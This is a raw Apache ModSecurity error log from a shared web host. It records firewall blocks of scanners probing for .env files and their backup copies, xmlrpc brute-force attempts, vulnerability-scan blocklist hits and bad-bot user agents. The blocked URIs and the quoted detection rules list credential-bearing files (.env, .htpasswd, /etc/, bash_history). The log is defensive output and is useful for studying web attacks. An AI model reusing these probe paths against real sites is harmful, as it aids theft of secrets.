[Tue May 26 16:32:56.221960 2026] [security2:error] [pid 808625:tid 808869] [client 207.241.173.169:36616] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahV94DEl_SBaWibfDmpVlgAAAHI"]
[Tue May 26 16:32:56.226548 2026] [security2:error] [pid 808625:tid 808871] [client 207.241.173.169:36590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahV94DEl_SBaWibfDmpVmAAAAHQ"]
[Tue May 26 16:32:56.227416 2026] [security2:error] [pid 808625:tid 808851] [client 207.241.173.169:36592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahV94DEl_SBaWibfDmpVmQAAAGA"]
[Tue May 26 16:32:56.230535 2026] [security2:error] [pid 808625:tid 808868] [client 207.241.173.169:36602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahV94DEl_SBaWibfDmpVlwAAAHE"]
[Tue May 26 16:32:56.254779 2026] [security2:error] [pid 808625:tid 808782] [client 207.241.173.169:36560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahV94DEl_SBaWibfDmpVmgAAABs"]
[Tue May 26 16:32:56.255543 2026] [security2:error] [pid 808625:tid 808761] [client 207.241.173.169:36574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahV94DEl_SBaWibfDmpVmwAAAAY"]
[Tue May 26 16:32:56.255930 2026] [security2:error] [pid 808625:tid 808828] [client 207.241.173.169:36554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahV94DEl_SBaWibfDmpVnAAAAEk"]
[Tue May 26 16:32:56.255959 2026] [security2:error] [pid 808625:tid 808805] [client 207.241.173.169:36542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahV94DEl_SBaWibfDmpVnQAAADI"]
[Tue May 26 16:32:56.257045 2026] [security2:error] [pid 808625:tid 808856] [client 207.241.173.169:36528] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahV94DEl_SBaWibfDmpVngAAAGU"]
[Tue May 26 16:32:56.257062 2026] [security2:error] [pid 808625:tid 808875] [client 207.241.173.169:36522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahV94DEl_SBaWibfDmpVnwAAAHg"]
[Tue May 26 16:32:56.258650 2026] [security2:error] [pid 808625:tid 808770] [client 207.241.173.169:36510] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahV94DEl_SBaWibfDmpVoQAAAA8"]
[Tue May 26 16:32:56.259788 2026] [security2:error] [pid 808625:tid 808856] [client 207.241.173.169:36494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahV94DEl_SBaWibfDmpVogAAAGU"]
[Tue May 26 16:32:56.259791 2026] [security2:error] [pid 808625:tid 808788] [client 207.241.173.169:36500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahV94DEl_SBaWibfDmpVowAAACE"]
[Tue May 26 16:32:56.261909 2026] [security2:error] [pid 808625:tid 808824] [client 207.241.173.169:36444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahV94DEl_SBaWibfDmpVpwAAAEU"]
[Tue May 26 16:32:56.261978 2026] [security2:error] [pid 808625:tid 808856] [client 207.241.173.169:36450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahV94DEl_SBaWibfDmpVpgAAAGU"]
[Tue May 26 16:32:56.262201 2026] [security2:error] [pid 808625:tid 808778] [client 207.241.173.169:36480] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahV94DEl_SBaWibfDmpVpQAAABc"]
[Tue May 26 16:32:56.263309 2026] [security2:error] [pid 808625:tid 808777] [client 207.241.173.169:36412] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahV94DEl_SBaWibfDmpVqgAAABY"]
[Tue May 26 16:32:56.263324 2026] [security2:error] [pid 808625:tid 808841] [client 207.241.173.169:36426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahV94DEl_SBaWibfDmpVqAAAAFY"]
[Tue May 26 16:32:56.264586 2026] [security2:error] [pid 808625:tid 808849] [client 207.241.173.169:36408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahV94DEl_SBaWibfDmpVrAAAAF4"]
[Tue May 26 16:32:56.264738 2026] [security2:error] [pid 808625:tid 808822] [client 207.241.173.169:36466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.rehobothindependentcare.com"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahV94DEl_SBaWibfDmpVpAAAAEM"]
[Tue May 26 16:32:56.436538 2026] [security2:error] [pid 808625:tid 808781] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV93zEl_SBaWibfDmpViQAAABo"]
[Tue May 26 16:32:58.363255 2026] [security2:error] [pid 808625:tid 808881] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV94TEl_SBaWibfDmpVzAAAAH4"]
[Tue May 26 16:32:59.718581 2026] [security2:error] [pid 808625:tid 808769] [client 168.227.140.178:44725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV94zEl_SBaWibfDmpV7gAAAA4"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 16:33:00.094696 2026] [security2:error] [pid 808625:tid 808794] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV94zEl_SBaWibfDmpV9QAAACc"]
[Tue May 26 16:33:02.035470 2026] [security2:error] [pid 808625:tid 808860] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV95TEl_SBaWibfDmpWEwAAAGk"]
[Tue May 26 16:33:02.221963 2026] [security2:error] [pid 808625:tid 808869] [client 117.198.37.168:54846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV95jEl_SBaWibfDmpWMQAAAHI"]
[Tue May 26 16:33:02.222102 2026] [security2:error] [pid 808625:tid 808869] [client 117.198.37.168:54846] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV95jEl_SBaWibfDmpWMQAAAHI"]
[Tue May 26 16:33:02.564414 2026] [security2:error] [pid 808625:tid 808771] [client 92.222.104.223:31376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "gldmarsa.com"] [uri "/robots.txt"] [unique_id "ahV95jEl_SBaWibfDmpWNgAAABA"]
[Tue May 26 16:33:02.564536 2026] [security2:error] [pid 808625:tid 808771] [client 92.222.104.223:31376] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "gldmarsa.com"] [uri "/robots.txt"] [unique_id "ahV95jEl_SBaWibfDmpWNgAAABA"]
[Tue May 26 16:33:02.687972 2026] [security2:error] [pid 808625:tid 808841] [client 207.241.173.115:42752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env"] [unique_id "ahV95jEl_SBaWibfDmpWOAAAAFY"]
[Tue May 26 16:33:03.909760 2026] [security2:error] [pid 808625:tid 808787] [client 54.39.210.242:33738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "gldmarsa.com"] [uri "/"] [unique_id "ahV95zEl_SBaWibfDmpWVwAAACA"]
[Tue May 26 16:33:03.909860 2026] [security2:error] [pid 808625:tid 808787] [client 54.39.210.242:33738] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "gldmarsa.com"] [uri "/"] [unique_id "ahV95zEl_SBaWibfDmpWVwAAACA"]
[Tue May 26 16:33:04.314920 2026] [fcgid:warn] [pid 808625:tid 808859] (70014)End of file found: [client 185.242.226.110:60803] mod_fcgid: can't get data from http client
[Tue May 26 16:33:04.577070 2026] [security2:error] [pid 808625:tid 808853] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV95zEl_SBaWibfDmpWVAAAAGI"]
[Tue May 26 16:33:05.338788 2026] [security2:error] [pid 808625:tid 808703] [remote 74.7.241.15:36234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-about-oration.php"] [unique_id "ahV96TEl_SBaWibfDmpWdQAAK00"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:33:05.482808 2026] [security2:error] [pid 808625:tid 808774] [client 20.195.199.65:6541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.singhcouriercargo.com.onesoft.in"] [uri "/about.php"] [unique_id "ahV96TEl_SBaWibfDmpWdgAAABM"]
[Tue May 26 16:33:05.483005 2026] [security2:error] [pid 808625:tid 808774] [client 20.195.199.65:6541] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.singhcouriercargo.com.onesoft.in"] [uri "/about.php"] [unique_id "ahV96TEl_SBaWibfDmpWdgAAABM"]
[Tue May 26 16:33:05.763751 2026] [security2:error] [pid 808625:tid 808873] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV96TEl_SBaWibfDmpWdAAAAHY"]
[Tue May 26 16:33:06.437030 2026] [fcgid:warn] [pid 808625:tid 808819] (70014)End of file found: [client 185.242.226.110:35649] mod_fcgid: can't get data from http client
[Tue May 26 16:33:07.007304 2026] [security2:error] [pid 808625:tid 808798] [client 207.241.173.115:43016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/app/.env"] [unique_id "ahV96zEl_SBaWibfDmpWowAAACs"]
[Tue May 26 16:33:07.007339 2026] [security2:error] [pid 808625:tid 808806] [client 207.241.173.115:43002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/api/.env"] [unique_id "ahV96zEl_SBaWibfDmpWpAAAADM"]
[Tue May 26 16:33:07.091967 2026] [security2:error] [pid 808625:tid 808792] [client 207.241.173.115:43030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/backend/.env"] [unique_id "ahV96zEl_SBaWibfDmpWpQAAACU"]
[Tue May 26 16:33:08.644914 2026] [security2:error] [pid 808625:tid 808788] [client 114.119.130.18:55531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/author/team/"] [unique_id "ahV97DEl_SBaWibfDmpW1QAAACE"], referer: https://moes-art.com/author/team/
[Tue May 26 16:33:08.671179 2026] [security2:error] [pid 808625:tid 808834] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV96zEl_SBaWibfDmpWywAAAE8"]
[Tue May 26 16:33:10.287222 2026] [security2:error] [pid 808625:tid 808779] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV97TEl_SBaWibfDmpW5AAAABg"]
[Tue May 26 16:33:12.191091 2026] [security2:error] [pid 808625:tid 808786] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV97zEl_SBaWibfDmpXDgAAAB8"]
[Tue May 26 16:33:13.320465 2026] [security2:error] [pid 808625:tid 808820] [client 117.198.37.168:55166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV98TEl_SBaWibfDmpXKQAAAEE"]
[Tue May 26 16:33:13.320622 2026] [security2:error] [pid 808625:tid 808820] [client 117.198.37.168:55166] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV98TEl_SBaWibfDmpXKQAAAEE"]
[Tue May 26 16:33:14.177683 2026] [security2:error] [pid 808625:tid 808859] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV98TEl_SBaWibfDmpXMgAAAGg"]
[Tue May 26 16:33:17.542896 2026] [security2:error] [pid 808625:tid 808799] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV98zEl_SBaWibfDmpXVQAAACw"]
[Tue May 26 16:33:17.902387 2026] [security2:error] [pid 808625:tid 808783] [client 142.93.3.131:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahV99TEl_SBaWibfDmpXdAAAABw"], referer: https://www.bloggertarget.com/
[Tue May 26 16:33:18.091781 2026] [security2:error] [pid 808625:tid 808800] [client 207.241.173.115:37758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local.swp"] [unique_id "ahV99jEl_SBaWibfDmpXfAAAAC0"]
[Tue May 26 16:33:18.094527 2026] [security2:error] [pid 808625:tid 808861] [client 207.241.173.115:37730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.backup"] [unique_id "ahV99jEl_SBaWibfDmpXfQAAAGo"]
[Tue May 26 16:33:18.100813 2026] [security2:error] [pid 808625:tid 808806] [client 207.241.173.115:37770] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.altiplanolibros.com.md-74.webhostbox.net"] [uri "/.env.local.orig"] [unique_id "ahV99jEl_SBaWibfDmpXfgAAADM"]
